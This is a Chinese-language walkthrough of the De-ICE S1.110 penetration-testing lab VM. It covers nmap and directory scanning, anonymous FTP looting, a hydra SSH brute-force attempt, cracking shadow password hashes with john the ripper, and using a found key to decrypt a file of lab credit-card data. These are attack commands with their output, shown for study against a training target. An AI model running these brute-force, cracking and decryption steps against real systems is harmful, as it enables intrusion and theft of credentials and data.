关于 De_ICE_S1.110 演示
https://www.youtube.com/watch?v=oLM6L1_LYV0&feature=youtu.be
https://hackerzoneh.blogspot.com/2014/05/de-ice-110.html
https://blog.techorganic.com/2011/07/20/de-ice-hacking-challenge-part-2/
https://blog.g0tmi1k.com/2010/02/de-icenet-v11-1110-level-1-disk-2/
https://pur3h4t3.blogspot.com/2007/12/de-ice-pentest-disc-1100.html
https://www.freebuf.com/column/196837.html
首先是使用nmap扫描
nmap -sC -sV -p- -oA deice110 10.57.31.34
根据扫描出来的结果提示可能要使用到的一下工具
nmap
ftp
strings
john the ripper
ssh
- FTP can be set for anonymous login exclusively
- Find out what files don't belong in a directory, and look at it closely
- If you can't crack the passwords, make sure you understand all the flags within john the ripper
- If you get customer credit card information, you've defeated this challenge. Congratulations
尝试各种可能的工具暴力猜解目标站点目录
python3 dirsearch.py -u http://10.57.31.34 -w /usr/share/dirb/wordlists/big.txt -e php
dirb http://10.57.31.34 -w /usr/share/dirb/wordlists/common.txt
gobuster dir -u http://10.57.31.34 -w /usr/share/wordlists/dirb/big.txt
根据扫描的结果,发现开放ftp端口,并且是允许匿名登录的,所以登录ftp下载所有ftp的文件夹,发现这个工具套件"cygwin" 这个工具套件查询了下,简单的说就是在Windows下能够运行Linux命令的套件工具
这里使用的ftp登录工具是lftp这个工具,我非常喜欢这个工具,因为她可以支持Tab键,下载ftp中的所有文件夹的命令如下:
mirror download download -左边是下载的目标文件夹,右边是下载到本地的文件夹名称
下载完成之后进入download文件夹使用命令 ls -lsaR * > ftplistanaysis.txt
上述意思是列出所有文件夹中的所有内容包括其子目录的文件名称和大小等等
然后本地通过图形或者vim编辑器一目了然的查看有哪些敏感可以利用的文件
经过查询,发现两个文件含有敏感信息一个是core 一个是shadow
刚开始我还没有发现core这个文件藏着重要敏感信息,只发现了shadow文件,并尝试使用john破解密码
发现的敏感文件如下:
/etc/shadow /opt/cygwin/etc/passwd,group bash.bashrc /opt/cygwin/etc/default/etc/bash.bashrc
/usr/bin/websave
首先尝试使用hydra看看是否存在简单的密码,可以破解
hydra -L usernames.txt -P finalusername.txt -e nsr -u -t 8 10.57.31.34 ssh
发现并没有成功,那么就直接使用ftp下载下来的shadow文件进行破解
cat shadow
root:$1$3OF/pWTC$lvhdyl86pAEQcrvepWqpu.:12859:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
- 使用darkc0de.txt暴力破解成功
- site:https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/darkc0de.txt
- 账户和密码是root:toor
john --wordlist=/usr/share/wordlists/seclist/scanlist/Passwords/darkc0de.txt shadow
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
toor (root)
1g 0:00:00:03 DONE (2019-11-17 12:01) 0.2645g/s 341942p/s 341942c/s 341942C/s too-big..Toothaker
Use the "--show" option to display all of the cracked passwords reliably
Session completed
john --show shadow
root:toor:12859:0:::::
1 password hash cracked, 0 left
- 但是发现这个密码是错误的,不能登录成功,并且root也不允许直接远程登录
- 所以经过再次探索发现有一个文件core存在敏感信息
- 通过命令strings查看这个core文件,因为这个文件使用file命令查看发现是可执行的ELF的文件
- 查看结果如下:
strings core |tail
.dynstr
.gnu.version
.gnu.version_d
.text
.note
.eh_frame_hdr
.eh_frame
.dynamic
.useless
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::bin:*:9797:0:::::daemon:*:9797:0:::::adm:*:9797:0:::::lp:*:9797:0:::::sync:*:9797:0:::::shutdown:*:9797:0:::::halt:*:9797:0:::::mail:*:9797:0:::::news:*:9797:0:::::uucp:*:9797:0:::::operator:*:9797:0:::::games:*:9797:0:::::ftp:*:9797:0:::::smmsp:*:9797:0:::::mysql:*:9797:0:::::rpc:*:9797:0:::::sshd:*:9797:0:::::gdm:*:9797:0:::::pop:*:9797:0:::::nobody:*:9797:0:::::aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
- 将上述查看到的结果密码进行整理,可以直接使用john进行暴力破解,将整理好的密码文件命名为 passwd
cat passwd
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::
bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::
ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
- 使用密码字典darkc0de.txt进行暴力破解
- john --wordlist=/usr/share/wordlists/seclist/scanlist/Passwords/darkc0de.txt --user=root,aadams,bbanter,ccoffee passwd
john --wordlist=/usr/share/wordlists/seclist/scanlist/Passwords/darkc0de.txt --user=root,aadams,bbanter,ccoffee passwd
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 4 password hashes with 4 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Complexity (root)
Zymurgy (bbanter)
2g 0:00:00:13 DONE (2019-11-17 12:26) 0.1515g/s 107371p/s 351000c/s 351000C/s Zuzana..zzzzzzzzzzzzzzz
Use the "--show" option to display all of the cracked passwords reliably
Session completed
john --show passwd
root:Complexity:13574:0:::::
bbanter:Zymurgy:13571:0:99999:7:::
2 password hashes cracked, 2 left
root:Complexity
bbanter:Zymurgy
最终成功破解出来两个账户和密码,使用普通用户进行远程ssh登录然后使用su 命令切换到root用户
开始查找加密文件
find / -name *.enc 或者 find / -iname *.enc
find / -name *.enc
/mnt/live/mnt/hdc/rootcopy/home/ftp/download/opt/cygwin/usr/share/groff/1.18.1/font/devps/text.enc
/mnt/live/mnt/hdc/rootcopy/home/root/.save/customer_account.csv.enc
find: WARNING: Hard link count is wrong for /mnt/live/proc/5934: this may be a bug in your filesystem driver. Automatically turning on find's -noleaf option. Earlier results may have failed to include directories that should have been searched.
/mnt/live/memory/images/05_common.mo/usr/share/t1lib/Fonts/enc/IsoLatin1.enc
/mnt/live/memory/images/05_common.mo/usr/share/t1lib/Fonts/enc/IsoLatin2.enc
/mnt/live/memory/images/05_common.mo/usr/share/t1lib/Fonts/enc/IsoLatin9.enc
/mnt/live/memory/images/05_common.mo/usr/share/t1lib/Fonts/enc/PSLatin1.enc
/mnt/live/memory/images/05_common.mo/usr/share/t1lib/Fonts/enc/dc.enc
/mnt/live/memory/images/05_common.mo/usr/share/t1lib/Fonts/enc/dvips.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/big5.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/euc-kr.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-2.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-3.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-4.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-5.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-7.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-8.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-9.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/windows-1250.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/windows-1252.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-euc-jp-jisx0221.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-euc-jp-unicode.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-sjis-cp932.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-sjis-jdk117.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-sjis-jisx0221.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-sjis-unicode.enc
/mnt/live/memory/images/02_core.mo/usr/share/groff/1.19.2/font/devps/text.enc
/mnt/live/memory/changes/home/root/.save/customer_account.csv.enc
/mnt/live/memory/changes/home/ftp/download/opt/cygwin/usr/share/groff/1.18.1/font/devps/text.enc
/usr/share/t1lib/Fonts/enc/IsoLatin1.enc
/usr/share/t1lib/Fonts/enc/IsoLatin2.enc
/usr/share/t1lib/Fonts/enc/IsoLatin9.enc
/usr/share/t1lib/Fonts/enc/PSLatin1.enc
/usr/share/t1lib/Fonts/enc/dc.enc
/usr/share/t1lib/Fonts/enc/dvips.enc
/usr/share/groff/1.19.2/font/devps/text.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/big5.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/euc-kr.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-2.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-3.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-4.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-5.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-7.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-8.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-9.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/windows-1250.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/windows-1252.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-euc-jp-jisx0221.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-euc-jp-unicode.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-sjis-cp932.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-sjis-jdk117.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-sjis-jisx0221.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-sjis-unicode.enc
/home/root/.save/customer_account.csv.enc
/home/ftp/download/opt/cygwin/usr/share/groff/1.18.1/font/devps/text.enc
- 找到了加密文件,发现加密文件旁边有个copy.sh脚本
- 查看此脚本有如下信息:
root@slax:/home/root/.save# cat copy.sh
#!/bin/sh
#encrypt files in ftp/incoming
openssl enc -aes-256-cbc -salt -in /home/ftp/incoming/$1 -out /home/root/.save/$1.enc -pass file:/etc/ssl/certs/pw
#remove old file
rm /home/ftp/incoming/$1
root@slax:/home/root/.save# ls /etc/ssl/certs/pw
/etc/ssl/certs/pw
root@slax:/home/root/.save# cat /etc/ssl/certs/pw
d2Ews4TgaQm72C0nr5t5U9noRfdllV62speWeC410il1lfd3Cxe2RqSx5o0Of
root@slax:/home/root/.save# ls
copy.sh* customer_account.csv.enc
root@slax:/home/root/.save# file customer_account.csv.enc
customer_account.csv.enc: data
root@slax:/home/root/.save# strings customer_account.csv.enc
Salted__
,xM' 7Uz
`@Tw
Ab(H
/PQ)oph
X2$,
0DZR"
nz,"y
- 此时便一目了然了,知道加密算法和加密密码,那么加个-d参数即可解密文件
- openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out /home/root/customer_account.csv -pass file:/etc/ssl/certs/pw
- 查看解密后的文件内容
root@slax:/home/root/.save# cat /home/root/customer_account.csv
"CustomerID","CustomerName","CCType","AccountNo","ExpDate","DelMethod"
1002,"Mozart Exercise Balls Corp.","VISA","2412225132153211","11/09","SHIP"
1003,"Brahms 4-Hands Pianos","MC","3513151542522415","07/08","SHIP"
1004,"Strauss Blue River Drinks","MC","2514351522413214","02/08","PICKUP"
1005,"Beethoven Hearing-Aid Corp.","VISA","5126391235199246","09/09","SHIP"
1006,"Mendelssohn Wedding Dresses","MC","6147032541326464","01/10","PICKUP"
1007,"Tchaikovsky Nut Importer and Supplies","VISA","4123214145321524","05/08","SHIP"
root@slax:/home/root/.save#
- 其他不同的点记录
- wget -qr ftp://10.7.9.25 批量下载ftp里面的所有文件
- https://hackerzoneh.blogspot.com/
#!/usr/bin/env python
# shadow2pass: generate a dummy passwd file with
# the encrypted passwords from a shadow file
import sys
start_uid = 500 # random UID
start_gid = 500 # random GID
for line in open(sys.argv[1]):
a = line.split(":")
print "%s:%s:%d:%d:,,,:/home/%s:/bin/bash" % \
(a[0], a[1], start_uid, start_gid, a[0])
start_uid += 1
root@tantras# ~/bin/shadow2pass myshadow.txt > mypass.txt
root@tantras# cat mypass.txt
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:500:500:,,,:/home/root:/bin/bash
aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:501:500:,,,:/home/aadams:/bin/bash
bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:502:500:,,,:/home/bbanter:/bin/bash
ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:503:500:,,,:/home/ccoffee:/bin/bash
https://blog.techorganic.com/
免责申明:本人所撰写的文章,仅供学习和研究使用,请勿使用文中的技术或源码用于非法用途,任何人造成的任何负面影响,或触犯法律,与本人无关